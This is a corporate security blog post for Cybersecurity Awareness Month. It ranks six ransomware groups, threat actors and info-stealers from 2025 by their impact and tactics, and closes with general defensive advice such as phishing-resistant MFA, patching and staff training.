October is Cybersecurity Awareness Month, an ideal moment to take stock of the evolving digital threats shaping our world. OpenText™ Cybersecurity’s annual Nastiest Malware list reveals a sobering truth: today’s cyberattacks aren’t just smarter, they’re more personal.

Armed with artificial intelligence and stolen identities, cybercriminals are moving faster than ever, blurring the line between human trust and machine deception. The result? A new era of attacks where deepfakes, identity theft, and AI-powered social engineering redefine what it means to stay secure.

The message is clear: today’s attackers aren’t just targeting systems, they’re targeting people.

From hunting vulnerabilities to hunting people

Attackers have stopped hunting for vulnerabilities and started hunting for people. They steal identities, forge voices, and deploy AI to outsmart defenses in seconds. In a world where trust can be mimicked in milliseconds, identity must become a person’s strongest signal of control.

This shift marks the rise of identity-first threats where deepfakes, AI-generated messages, and credential theft are now front-line weapons.

The nastiest malware of 2025

1. Qilin: This ransomware-as-a-service powerhouse tops the 2025 list after a relentless wave of attacks on hospitals, laboratories, and local governments worldwide. It executed more than 200 confirmed incidents, averaging one new healthcare breach every week. Its “Call Lawyer” negotiation feature and ties to state-backed actors like North Korea’s Moonstone Sleet highlight how ransomware has evolved into a professionalized, geopolitical enterprise.
2. Akira: Now operating like a disciplined enterprise, Akira shifted focus to high-value targets and managed service providers while avoiding critical infrastructure. A midyear SonicWall VPN campaign compromised dozens of organizations within days, proving the group’s efficiency and staying power.
3. Scattered Spider (UNC3944): One of 2025’s most notorious threat groups, Scattered Spider weaponized deepfake voice calls, SIM swaps, and help-desk impersonation to win instant access to corporate networks. September’s international arrests exposed core members, but splinter crews and copycats continue to reuse the group’s playbook of manipulation and identity fraud.
4. Play Ransomware: Play quietly became one of the year’s most destructive threats, with the FBI confirming more than 900 victim organizations. By hijacking managed service providers and remote-management tools, it turned single compromises into cascading supply-chain breaches that disrupted hundreds of businesses at once.
5. ShinyHunters: Known for long-term infiltration and patience, ShinyHunters breached major enterprises including Google, Salesforce, and luxury brand Kering, parent company of Gucci and Balenciaga, before auctioning stolen data online. The group times leaks to coincide with regulatory disclosures, turning compliance pressure and brand damage into powerful extortion weapons.
6. Lumma Stealer: A core enabler of 2025’s ransomware ecosystem, Lumma supplied credentials and access for major groups like Qilin and Akira through large-scale data theft. After a Microsoft takedown midyear, it reappeared within days using fake installers and “ClickFix” phishing pages to trick users into running malicious commands and surrendering sensitive information.

Together, these groups show how identity abuse and AI innovation have merged, turning traditional hacking into a full-fledged ransomware economy.

Staying one step ahead

Defending against this new breed of cyber threat requires more than traditional antivirus or perimeter security. OpenText Cybersecurity recommends:

• Protect identity first using phishing-resistant multifactor authentication and zero-trust architecture.
• Patch vulnerabilities and monitor for info-stealers.
• Secure remote tools and regularly test backups.
• Train employees to spot deepfakes and social engineering attempts.

Cyber resilience today means understanding that every person, every login, every device can be both a target and a line of defense.

Join the movement this Cybersecurity Awareness Month

Cybersecurity isn’t just a corporate responsibility—it’s a personal one. Whether you’re managing sensitive business data or protecting your own digital footprint, awareness is your best defense.

Visit OpenText’s Cybersecurity Awareness webpage to explore interactive activities, test your cyber smarts, and learn practical ways to stay secure—at work and at home.

Read a more in-depth report on OpenText’s list of 2025 Nastiest Malware from OpenText Senior Security Analyst Tyler Moffitt here.

The post Beware the nastiest malware of 2025 appeared first on OpenText Blogs.